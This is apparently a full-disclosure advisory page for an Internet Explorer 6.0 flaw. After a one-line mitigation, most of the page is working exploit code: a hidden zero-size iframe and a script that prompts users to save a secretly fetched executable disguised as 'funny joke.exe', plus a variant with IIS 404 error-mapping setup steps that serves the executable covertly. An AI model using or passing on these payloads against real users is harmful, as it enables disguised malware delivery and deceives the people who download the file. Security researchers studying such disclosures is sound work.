Secunia did not release the technical details (aka Security by Obscurity) thus we publish this page (aka Full Disclosure)

Solution

Disable Active Scripting and the "Hide file extensions for known file types" option [Tools->Folder Options->View]

Credits : go to cyber flash

How does it work ? A.K.A Exploit

The following code requires no special server setup, and should work from any webpage that IE 6.0 fetches:

<html>
<body>
<iframe src='http://domain.com/v.exe?.htm' name="NotFound" width="0" height="0"></iframe>Click
<a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">
here</a>.
</body>
</html>

Also, here's an example that requires modifying the IIS Error Mapping Properties (see below):

<html>
<body>
<iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>Click
<a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">
here</a>.
</body>
</html>

Steps to configure IIS:

Launch Internet Information Services manager.
Under the 'Custom Errors' tab, modify the Error Mapping Properties as follows:

i. Error Code: 404
ii. Default Text: Not Found
iii. Message Type: URL
iv. URL: /v.exe (name of the executable)

Within the HTML page, insert an IFRAME as follows:

<iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>

The file 'vengy404.htm' intentionally doesn't exist on the server, so it will trigger a 404 error message as defined above. But, the javascript code below references the stealthy v.exe data within the frame 'NotFound' and is linked to 'funny joke.exe' when prompted to save the file:

javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');